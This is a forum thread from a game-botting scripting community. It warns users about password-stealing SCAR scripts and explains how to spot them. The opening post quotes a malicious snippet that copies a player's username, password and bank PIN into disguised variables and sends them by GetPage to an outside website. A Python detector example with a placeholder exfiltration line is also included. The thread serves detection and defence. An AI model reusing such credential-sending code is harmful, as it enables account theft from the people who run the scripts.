How to detect password stealing scripts



Waddo
07-29-2008, 11:19 AM
Recently an SRL member, "IROKI", has been found to be password stealing.
(Good catch, BobboHobbo)
So if you have used one of his scripts recently, change all your passwords that are the same as your RuneScape one. If your email is the same, it is of great importance that you change this, as it can be used to find all your passwords.

OK, so when a script is used to steal passwords, it sends the passwords to a website.

There are multiple methods of this:

1. Using GetPage

2. Using Plugins (this way is almost undetectable)


1. Using GetPage

This was used recently by Iroki:

Procedure DeclarePlayers;
Begin
  HowManyPlayers := 1;
  NumberOfPlayers(HowManyPlayers);
  CurrentPlayer := 0;

  Players[0].Name := ''; // Your UserName
  Players[0].Pass := ''; // Your PassWord
  Players[0].Nick := ''; // Your Nick (3-4 letters from your username)
  Players[0].Active := True; // Use this player ??
  Players[0].Skill := 'Prayer'; // Skill to lamp
  Players[0].Strings[0] := ''; // Your BankPin
  Players[0].Strings[1] := 'Adamant'; // What kind of bars you want to smelt ( Bronze, Iron, Silver, Steel, Gold, Mithril, Adamant, Rune, CballsFO, CballsFB )

  Code[0] := '';
  Code[1] := '';
  verKey := '';
End;

There we can see that you enter some of your char info and some other info; nothing wrong with that.

However, combined with:

Begin
  If (Code[0] = '') Or (Code[1] = '') Or (verKey = '') Then
  Begin
    Code[0] := Players[CurrentPlayer].Name;
    Code[1] := Players[CurrentPlayer].Pass;
    verKey := Players[CurrentPlayer].Strings[0];
  End;
  For i := 1 To Coding Do
  Begin
    Code[0] := CodeNow(Code[0]);
    Code[1] := CodeNow(Code[1]);
  End;
End;

Here we see that the codes and verification key are changed to the account details =O. In all honesty there is nothing wrong with that, even tho it's unnecessary, so if you see this be very suspicious. If you're still not sure, ASK; better safe than sorry.

Now the part that should make you worried.

GetPage('http://www.iroki.cba.pl/stats.php?tresc=Code[0]=' + Code[0] + '+Code[1]=' + Code[1] + '+verKey=' + verKey + '+&CreateSessionIDverKey+');


Here they are sending Code[0], Code[1] and verKey, which earlier we learned were changed to your account details, to a website.

Get/PostHTTPPage/Ex can also be used instead of GetPage (Thanks Mixster)

If you see this, be wary.

Don't use it if you see this.


Thanks Mixster for stuff below

Get/PostHTTPPage/Ex are the other ways to use it that are easier to spot while going through the script, but harder to notice in popups as it simply has 'POST' or 'GET' at the end of the URL.

Plugins have the advantage of not asking for permission to access a webpage, but are still tracked in the same way of checking every use of username and password, as they still have to be input into a procedure/function to send the info into the plugin.

The only way to be 100% sure a script won't steal your details is to follow the script's logic and see where it uses your username and password. Every method can be stopped that way.
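
Added example (not part of Waddo's post and not SRL or SCAR code): a small Python static check that does by machine what the post describes doing by hand. It marks variables that receive Players[...].Name, .Pass or .Strings[...] and lists every GetPage or Get/PostHTTPPage(Ex) call with its line number and any marked variables in its arguments. The sample script is constructed from the snippets above with placeholder hosts, and reading "Get/PostHTTPPage/Ex" as GetHTTPPage, PostHTTPPage, GetHTTPPageEx and PostHTTPPageEx is an assumption.

```python
import re

# Credential fields of the Players[] record as used in the quoted script
# (Strings[] counts because that script keeps the bank PIN in Strings[0]).
SOURCE = re.compile(r"\bPlayers\s*\[[^\]]*\]\s*\.\s*(?:Name|Pass|Strings)\b", re.I)
# GetPage plus the Get/PostHTTPPage/Ex family (the expansion is an assumption).
SINK = re.compile(r"\b(GetPage|(?:Get|Post)HTTPPage(?:Ex)?)\s*\(([^;]*)", re.I)
# "name[idx].field := rhs"; rhs ends at ';' or at a block keyword.
ASSIGN = re.compile(
    r"\b([A-Za-z_]\w*)\s*(?:\[[^\]]*\])?(?:\s*\.\s*\w+\s*(?:\[[^\]]*\])?)*\s*:="
    r"(?=(.*?)(?:;|\b(?:do|then|else|end)\b|\Z))", re.I | re.S)
# String literals and comments, removed so URL text is not read as code.
NOISE = re.compile(r"'[^'\n]*'|//[^\n]*|\{.*?\}", re.S)
IDENT = re.compile(r"[A-Za-z_]\w*")


def _blank(m):
    # Literals become ''; comments keep only their newlines (line numbers hold).
    return "''" if m.group().startswith("'") else "\n" * m.group().count("\n")


def _names(text):
    return {t.lower() for t in IDENT.findall(text)}  # Pascal is case-insensitive


def tainted_vars(code):
    """Fixpoint over all assignments: a variable is tainted once anything
    assigned to it reads a credential field or another tainted variable."""
    tainted, changed = set(), True
    while changed:
        changed = False
        for m in ASSIGN.finditer(code):
            lhs, rhs = m.group(1).lower(), m.group(2)
            if lhs in tainted or lhs == "players":
                continue
            if SOURCE.search(rhs) or _names(rhs) & tainted:
                tainted.add(lhs)
                changed = True
    return tainted


def scan(script):
    """Return one finding per network call: line, function, leaked names."""
    code = NOISE.sub(_blank, script)
    tainted = tainted_vars(code)
    findings = []
    for m in SINK.finditer(code):
        leaks = _names(m.group(2)) & tainted
        if SOURCE.search(m.group(2)):
            leaks.add("players[]")
        findings.append({"line": code.count("\n", 0, m.start()) + 1,
                         "call": m.group(1), "leaks": sorted(leaks)})
    return findings


# Constructed sample: condensed from the snippets quoted in the post, with
# placeholder hosts; the call on line 18 is a harmless version check.
SAMPLE = """\
Procedure DeclarePlayers;
Begin
  Players[0].Name := ''; // Your UserName
  Players[0].Pass := ''; // Your PassWord
  Players[0].Strings[0] := ''; // Your BankPin
  Code[0] := '';
  verKey := '';
End;
Procedure Setup;
Begin
  If (Code[0] = '') Or (verKey = '') Then
  Begin
    Code[0] := Players[CurrentPlayer].Pass;
    verKey := Players[CurrentPlayer].Strings[0];
  End;
  For i := 1 To Coding Do
    Code[0] := CodeNow(Code[0]);
  Latest := GetPage('http://scripts.example.invalid/version.txt');
  GetPage('http://collector.example.invalid/stats.php?a=' + Code[0] + '+verKey=' + verKey);
End;
"""
```

A finding with an empty leaks list is only a network call to review by hand. The check does not follow values through procedure parameters, plugins or encoded strings, so it supplements reading the script rather than replacing it.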

Daniel
07-29-2008, 11:49 AM
2. Using Plugins (this way is almost undetectable)
Don't give people ideas <_>

BobboHobbo
07-29-2008, 12:30 PM
Credits on who found it pl0x :p

Nah jks. Should be easy to make a script to scan for password theft. I'll make one soon :P.

Shuttleu
07-29-2008, 02:33 PM
Not that I am planning to make one (which I definitely will not), but how do you make it do it through plugins?

If you don't want to tell me then you don't have to.

~shut

Waddo
07-29-2008, 03:58 PM
Lol, I have no idea. I was hoping someone would tell me something about them so I could add it. I'm obviously not going to put how to, tho.

I think mixster knows.

randy marsh
07-29-2008, 04:15 PM
Maybe all scripts should be vetted before they get posted? Or make someone on the forums in charge of checking scripts?

Waddo
07-29-2008, 04:17 PM
Yes, I've thought of that and I'd be happy to do it, but there are a lot of scripts released and scripts can be edited pretty easily, so it wouldn't work.

Zyt3x
07-29-2008, 04:19 PM
hmm... Iroki... Can't remember him :s

Anyways, it should be easy to screw his password-stealing script by just setting Code[0] to ' ', as the internet does not allow spaces (they use %20 as spaces).

Waddo
07-29-2008, 04:26 PM
Actually, setting it to anything would work, as it only changes to account details if they leave it blank =p

Zyt3x
07-29-2008, 04:28 PM
True :D


Quote:
Originally Posted by Waddo
2. Using Plugins (this way is almost undetectable)

Don't give people ideas <_>

Claymore
07-29-2008, 05:28 PM
Rofl! Smart son of a.... Ill keep an eye for them.

insanomano
07-29-2008, 05:36 PM
This is a very good thread cause I heard about Iroki and im sure there is going to be a lot of copycats out there that have no respect for others accounts. Good Job

ShowerThoughts
07-29-2008, 06:43 PM
When mods have to accept script to get them posted, they could also look through for code optimization etc etc

Rich
07-29-2008, 08:01 PM
There are roles of moderators and admins, so why couldn't we have some people, like said above, check scripts for their code, who could be called 'Script Analysers' or something along those lines. They could have a green name colour, also.

Timer
07-29-2008, 08:03 PM
*makes a plugin!*
*implants it in scars main plugin folder for new scar release*
*h4x every one I hate*

Scaper
07-29-2008, 08:10 PM
I think there should be a script submittance just like the SRL member application so we can scan scripts before we give them the go-ahead. I think that will be almost certain to stop 'em.

randy marsh
07-29-2008, 10:38 PM
But then every new version would have to be checked if it got re-released!


I unofficially make Waddo a script checker, as you're always on here!

jose89
07-29-2008, 10:46 PM
Please have srl staff review scripts before anyone uses them (more than 2 staffs) Now that one was caught I bet there will be more.

mixster
07-29-2008, 10:49 PM
Checking every script takes ages and is pointless considering there have only been a couple of incidences.
Plugins only have the advantage of not asking for permission to access a webpage, but are still tracked in the same way of checking every use of username and password, as they still have to be input into a procedure/function to send the info into the plugin.
Lastly, Get/PostHTTPPage/Ex are the other ways to use it that are easier to spot while going through the script, but harder to notice in popups as it simply has 'POST' or 'GET' at the end of the URL.
The only way to be 100% sure a script won't steal your details is to follow the script's logic and see where it uses your username and password. Every method can be stopped that way.
Edit:
R0b0t1, the advisor, says: 'No'

MylesMadness
07-29-2008, 10:53 PM
No one every script being searched. How about this, you quit being leechers, learn to script and search it yourself.

Waddo
07-29-2008, 11:22 PM
Myles + everyone else who thinks we should check all the scripts

It takes 20 seconds to edit a script and repost.
If there was a filter then that would mean that when a script was posted it would be held in some storage and could possibly lag up the forums. Checking each script is a bad idea. I would do it if I was asked, I have a lot of free time.

Even in the free for all section the admins only check once, then you can edit how you please.

MylesMadness
07-29-2008, 11:29 PM
Myles + everyone else who thinks we should check all the scripts

It takes 20 seconds to edit a script and repost.
If there was a filter then that would mean that when a script was posted it would be held in some storage and could possibly lag up the forums. Checking each script is a bad idea. I would do it if I was asked, I have a lot of free time.

Even in the free for all section the admins only check once, then you can edit how you please.

When did I say I supported it?

mixster
07-29-2008, 11:30 PM
Waddo: This has happened only a couple of times and is completely unnecessary. Checking each and every script is the same as the governments of the world deciding that every person should be strip searched before entering every building. If it was a common thing, then I would agree that some form of pre-approval would be needed, but it isn't common at all. It would just waste a lot of time in the long run with minimal results.

Waddo
07-30-2008, 12:26 AM
Mixster, that is what I'm saying. Read, godarn it, read.

checking each script is a bad idea

And Myles, I have no idea why I said you :confused: my mistake =p

mixster
07-30-2008, 12:30 AM
You posted earlier saying you would like it though pointed out it wouldn't work, so I thought this was your suggestion to fixing that - mainly because I found it very hard and still do to understand your post and all I could extract from it was your suggestion for a script storage area where it would have to be pre-approved and that you wouldn't mind doing it.

Waddo
07-30-2008, 12:32 AM
I wouldn't mind helping to do it if it came to that, but it won't, as it will do no good, especially when people make 2 or 3 mistakes and re-upload 3 times in an hour.

Hobbit
07-30-2008, 05:35 AM
Stickied

Waddo
07-30-2008, 11:57 AM
Woah, Thanks Hobbit, Second sticky.

Thanks Mixster for your input.

Ghostman
07-30-2008, 01:33 PM
I'm glad someone posted this, I heard about this guy and how he was stealing passwords.

R0b0t1
08-07-2008, 10:29 PM
When in doubt, it'd be good if you just voiced your concern -- there's no harm done, as it's not an outright accusation.

Also, I'd like everyone to note that the stealer only gets about one or two accounts before they're intercepted. Although we can't repay those people, we can at least make sure we discourage account stealing as unprofitable compared to the money you make autoing from using SRL (there are other reasons, but this is the only one account stealers look at).


I'd also like to suggest that we find a way to ban an IP from the SVN, is that possible? I mean, if he tries to come back. He can decide himself if he wants to learn to set up Tor or pay extra for a dynamic IP.

jose89
08-09-2008, 02:08 AM
I just suggest that if you don't know how to read over scripts and see if it is a password scamming script, just use a well-known script (you know, like one with lots of progress reports and the thread has lots of pages =p)

isaacxia10
08-09-2008, 04:10 AM
Wow why didn't I figure that out myself.....

R0b0t1
08-09-2008, 04:20 AM
I just suggest that if you don't know how to read over scripts and see if it is a password scamming script, just use a well-known script (you know, like one with lots of progress reports and the thread has lots of pages =p)

That's the problem -- iroki was an SRL member, and his scripts were very good. Too bad he didn't realize how easy it is to track, or how hard it is to transfer items anymore.

lethalpunk
08-09-2008, 10:41 AM
Someone mentioned a script scanner. Could someone not make one, and if you are unsure of a script, scan it yourself instead of wasting other people's time?

atr
08-10-2008, 04:44 AM
Thanks I will start looking through scripts to make sure no one steals my pass.

Magiic
08-10-2008, 09:02 AM
There's no need to scan thoroughly through every script, as most scripters on SRL are actually good people and have lives, so really it's only when idiots like iroki come around we should start worrying. And I thought his was the only password stealing script out there; whose else is?

I 1337 I
08-16-2008, 09:31 AM
Thanks, my acc was stolen because of PC bot, it worked but really slow (4points in 2hours) :D

blobo23
08-18-2008, 01:23 PM
TY i am new to this and the first script i got had a keylogger in i cant remember whos it was but now i will no :D

Waddo
08-18-2008, 08:11 PM
Erm if it had a keylogger in then you didnt get it from here
unless you downloaded the keylogger script which is a keylogger and nothing else
i dont think there are any harmful keylogger scripts written in scar

happyme
08-19-2008, 05:38 PM
Just wondering, are there any cases where a script could LEGITLY try to get a page?

sf411
08-20-2008, 05:11 AM
Thanks for this man, now I check every script I use! +rep for ya!

mr.peer
08-24-2008, 07:35 PM
I like the script idea.

Smarter Child
08-26-2008, 01:17 AM
Why doesn't someone make a program that scans a script and give it out to the community, so we can scan it ourselves without making others check it, and if someone doesn't scan it then tough luck for them.

Leather Cock~

Waddo
08-26-2008, 01:58 AM
As it is not that easy, because there are many ways to disguise it.

CallOfVideos
09-02-2008, 06:34 PM
thanks. it helped alot =)

kensaurus
09-03-2008, 08:54 AM
iroki...
FUCK YOU!

Shuttleu
09-03-2008, 08:59 AM
iroki...
FUCK YOU!
calm down dear :p

iroki may have done the wrong thing but he has been banned and thats the end of him
soo... please dont swear :redface:

~shut

Waddo
09-03-2008, 09:58 AM
If you didn't have 261 post count I'd say you were trying to get your post count up,
but either way stop spamming. If you don't have anything useful/funny/worthwhile to say, don't say it at all.

Accure
09-05-2008, 04:26 PM
Thanks.. will look for these items when using scripts

metalguitarfro
09-07-2008, 07:40 AM
Thanks guys. Being new to SCAR, knowing stuff like this from the beginning is very useful.

brad734
09-14-2008, 01:03 AM
ty 4 the tip

cookiedude1
09-21-2008, 07:39 PM
thanks, i think this will definetly help me :)

Waddo
09-21-2008, 11:02 PM
so many ty's yet so little rep nar im jk its good that it helped u

simple skill
09-22-2008, 07:43 PM
I don't think someone checking would work at all because, as you said, with plugins it's almost undetectable and it would just take people too long to look through all the scripts made.

Waddo
09-23-2008, 07:06 AM
its not for that
its basically for sythe there are very few hackers on here because we are trust worthy

rudehead
10-06-2008, 03:08 PM
Omg!! Willow cutter r steelz my password. I'm really new to this, hope it doesn't happen to me.

redda69
10-09-2008, 03:40 PM
Thanks i have no idea about scripts myself i just use them now im going to copy and paste this so i know lol ta

bigk011
10-12-2008, 12:02 AM
ty verymuch for this info:eek: i only auto on my main, so i do need to know how to look out for this

osmm
10-12-2008, 12:48 AM
I don't REALLY post to thank YOU, because I know that no one is really going to do anything new. I mean, no one is ACTUALLY going to check scripts for account stealing, people are just too lazy (from what I believe).

BUT! I do thank BH for being so god damn aware! Nice job bro!
Also I hope I did not sound like a bi*ch to you. I do appreciate you telling us about the subject matter, as I was clueless on what account stealing code would look like; but I am just trying to nicely say I highly doubt anyone will check scripts more than they have been before this thread was created.

lowell
10-14-2008, 10:58 AM
great thanks

crunkjmp007
10-16-2008, 05:51 AM
Interesting they would use their time on this, when really its quite sad, thanks for catching it

theo
10-25-2008, 09:51 AM
Well... using plugins... I have no idea about that one, but if someone would change something like SRL.scar to make it do a certain function when included in a script... that might work. So be careful on that one too...

jondyr
10-25-2008, 11:34 AM
Nice. almost got hacked... thanks ;)

Daniel
10-25-2008, 12:15 PM
Nice. almost got hacked... thanks ;)
Which script almost hacked you? Report it immediately! If no script "almost hacked you", then that post (along with your others) are totally spam, which we here at SRL don't like!

Fsoul
10-26-2008, 01:06 AM
Yay.. my paranoia increases

Ruroken
10-26-2008, 05:51 AM
Yay.. my paranoia increases

In my time at SRL (two years) there have been TWO incidences of pass stealing ;)

imported_night_hawk
10-27-2008, 05:01 PM
exellent find. You save many new people to scar accounts on rs2

lixi
10-29-2008, 11:44 PM
Thanks for the heads up:D

Lorken
10-31-2008, 04:37 AM
thanks!

h1mmelman
10-31-2008, 02:00 PM
thanks for posting this form saved my but :)

GoF
10-31-2008, 02:51 PM
Oh god.. The stupidity... "Tyvm 4 savin mah accuntz!11!! almost got hackd" like wtf there was that one polish guy and mage of begu.. Only pass stealers out there. Spamspamspamspam.

flaminhaz
10-31-2008, 04:59 PM
ii didnt realise that it wouldnt be that obvious anyone could.. actually better not say it, might give people ideas! anyway, thanks for letting us know

suph4l33t
11-01-2008, 11:38 AM
thanks alot, this is exactly what i needed =)
now im gonna feel safer :P

vzlarik
11-03-2008, 06:46 PM
Thanks, didn't know this

triax
11-04-2008, 05:34 PM
Great guide to find some hackers. But it's kinda stupid. Botters shouldn't hack botters...

Bammeh
11-06-2008, 04:05 AM
I've never used an auto-er.
But, I'll be sure to look out for things like this since I am beginning.

mistikman
11-06-2008, 04:11 AM
Stealing people's accounts is lame anyway... What kind of loser wants to steal someon's account?

Ruroken
11-06-2008, 04:58 AM
Just wondering, are there any cases where a script could LEGITLY try to get a page?

Yes, for checking versions (any script) and auths (pay scripts only). Also SRL Stats?


I have infracted some of the recent, blatant spam. Let this be a lesson to you spammers.

shynie
11-06-2008, 07:17 AM
Yes, for checking versions (any script) and auths (pay scripts only).

About this (offtopic):

Isn't it possible to just remove the auths if you have a script like that or is it obfuscated in some way..?

Ruroken
11-06-2008, 07:19 AM
About this (offtopic):

Isn't it possible to just remove the auths if you have a script like that or is it obfuscated in some way..?

It's obfuscated or encrypted. Or the author is about to get many copies of his script leaked :p

StrikerX
11-06-2008, 07:27 AM
Hey, thanks for the advice. I don't mean to be a naysayer, but isn't this also teaching people how to make a password stealing script?

Ruroken
11-06-2008, 07:46 AM
Hey, thanks for the advice. I don't mean to be a naysayer, but isn't this also teaching people how to make a password stealing script?

Ehh... I GUESS... but anyone who can script should know how to do this. Besides, it's a fairly rare occurrence for two reasons:

1) Unknown scripters'/members' scripts will usually be looked over to see the quality of the script, as you don't want to trust your accounts to a crap script. This is when they find the pass stealing bit.

2) It's rare that a trusted member will trade their position in SRL for some RS accounts. (This has happened like... 3 times in my 2 years here).

Yoast
11-09-2008, 06:30 PM
Thanks, helped a lot :)

Not that I wouldnt first check the entire script before filling in my pass somewhere, though :P

lolurdead
11-11-2008, 07:26 AM
not sure if ill be able to catch this.. but thx for the tip

bnen
11-17-2008, 07:34 PM
thnaks man

crazyronpoker
11-19-2008, 11:11 PM
thanks for the update, i would have noticed after a while

Ninjew
11-22-2008, 11:50 AM
Thank you! :D
Very much! :D

HarryJames
11-22-2008, 01:14 PM
Would it be bad to send all accounts made (just the name) to a server to see the names? (although same thing could be done with SRLReport)

defnubure
11-26-2008, 05:35 AM
Thank you. Now I will make sure to check the Scripts so i cant get hacked. :D

T0xicblood
11-26-2008, 06:44 PM
I think i kinda get it...

n33d scripts
11-27-2008, 11:17 AM
great now i can see if i get scammed :D

rsman44
11-29-2008, 04:18 PM
Is it possible to delete a part of a script that looks like this?

Romey
11-30-2008, 10:37 AM
Thank you for that info I have been scammed a long time ago.

stuffs
12-05-2008, 09:51 PM
Thanks for this, it's very helpful.

ash1205
12-20-2008, 11:49 PM
i've not used a scar script yet but now when i do atleast i know how to check if its safe :) thanks :)

Goodpeople
01-03-2009, 10:33 PM
Thanks for the help!!
goodpeople

happy man
01-04-2009, 03:54 AM
omg thank you for showing me this i wouldnt of known thanks and good job you guys

only lvl str
01-05-2009, 08:17 PM
Thanks for the info, this should help me keep my password safe. I know what to do now. :D

corn77
01-11-2009, 09:00 PM
Thanks for the information. I had actually seen one of his scripts and contemplated getting it, but then I realized that his account was banned and thus decided not to download. Appreciate it.

-corn77

H0TSAUCE
01-18-2009, 02:31 PM
Don't give people ideas <_>

Agreed. :eek:

Iroki
01-18-2009, 02:37 PM
Agreed. :eek:

You know that this topic has 8 months. Maybe you should post something useful??

scar_operater
01-20-2009, 09:12 PM
Thanks for the heads up, never actually knew that these scripts could steal pws.

gamer0n1
01-23-2009, 01:31 AM
thanx a lot for this =D

Cds000
01-23-2009, 06:56 AM
Good... that's soo annoying

FROST-2oo8
01-25-2009, 11:52 AM
Wow Thanks, Im new to the forum and i would've been the perfect target if it weren't for this :)

Theolithical
01-27-2009, 12:21 AM
Thanks a lot for the tip. Being that I'm new to all of this I might hold off from downloading/using any new programs until I am more familiar with the commands.

Baked0420
01-27-2009, 02:48 AM
theolithical: don't worry, you don't need to get so paranoid as to not use any scripts, besides we all know you're going to leech at first anyway :p, just playing. But if you are really worried, then just make sure smart, well respected people have posted on the thread. If they don't say anything about the script looking suspicious then you most likely have nothing to worry about, but not always. Just use caution, and also you could just use very popular scripts, or scripts from very well trusted people.

norbiux
02-10-2009, 08:25 PM
very helpful thz

PsychicDemon
02-13-2009, 03:32 PM
It's not hard to see if there's malicious code in SCAR scripts.
Just look for http as u said, before you start it.

But the biggest problem is if someone encrypts the website into unreadable text, with some kind of algorithm.
But I don't think there are so many elite haxors on here :D
So I suggest not to look for a guy saying "its clean no virus" on the forums; instead look through it, at least a little.

And by the way, what anti-virus are you guys using?
Yes, I know anti-virus won't detect SCAR scripts but I just wanted to know which one is the best. I currently use avast.

reed6273
02-17-2009, 11:25 PM
I tried a script and it did basically the same thing, and then it went to log and it typed "im really bo...", which I figured meant "im really bogus". I've run into quite a few of these and I was wondering what should I do now with my account?

Da 0wner
02-18-2009, 12:25 AM
Alternatively, you can run this. Account Stealer Checker (http://www.villavu.com/forum/showthread.php?t=41446).

Krisando
02-20-2009, 05:29 AM
Thank's I'll keep it in mind for future use in scripts ;P
*Joking but Im not certain this was a good idea telling people :(*

curran0021
02-22-2009, 02:18 PM
thank you i appreciate you taking your time to protect me.

award982
03-02-2009, 06:39 PM
Just wondering, are there any cases where a script could LEGITLY try to get a page?

yeah,and like should i allow it to access internet?

Da 0wner
03-03-2009, 12:50 AM
Yes, of course. There's many cases.

GE price getting, version checking, etc.

Wanted
03-03-2009, 04:36 AM
This won't work, seeing as it's easy to hide code in scripts if you know what you're doing. I did it with RCrB to hide the copyright debug notice. The only way to prevent this is to have a firewall that asks, for every program in any instance, whether to allow or not allow it to connect to the internet, in which case you can block/allow/monitor the information being sent or received through any outside connection.

I'm sorry to inform all of you, but this will only prevent you from being screwed from an obvious attempt and will waste a significant amount of time trying to read through code that won't help you necessarily.

Don't get me wrong, it's still a good idea but you should really tell people they are still at risk after doing this unless they have the correct firewall settings, because right now it's like a false positive feeling that you're 100% safe when there are many back doors and methods around this.

Da 0wner
03-03-2009, 06:37 AM
If you are a good coder, looking through the code is really the best option. You should be able to find the malicious code easily and remove it.

Also, why do you advertise RCrB every chance you can get?

staleroflcake
03-08-2009, 08:45 PM
Haha, some people don't feel like learning (like me) but i'll look out for this stuff. Thanks :P

Kaede
03-11-2009, 03:39 AM
I do look through the codes to make sure no one is stealing my pass :)
because I would hate to lose my account :mad:

Dark Arcana
03-11-2009, 07:04 AM
hmmm..I might try this, joke. Thx for the warning :D

Turtle Dude
03-11-2009, 09:43 PM
Thnx Waddo, ill keep an eye out for them.

Mushini
04-22-2009, 06:58 AM
Hey preventing Scar from accessing the internet could also be a preventive measure?
I think it would be a small but useful step, you?

b l o o d007
05-22-2009, 10:35 AM
THX i got one of my accounts hacked. it really sucks cuz i lost all my money!!!!!

Waddo
05-30-2009, 06:53 AM
AMSA no scars internet connection functions are one of the many things that make scar my favourite "Programing language" ...getpage...drools :p

easyas4
07-07-2009, 11:03 AM
http://sythe.org/showthread.php?t=575068
script scanner made by cazax. includes virus scan of the .exe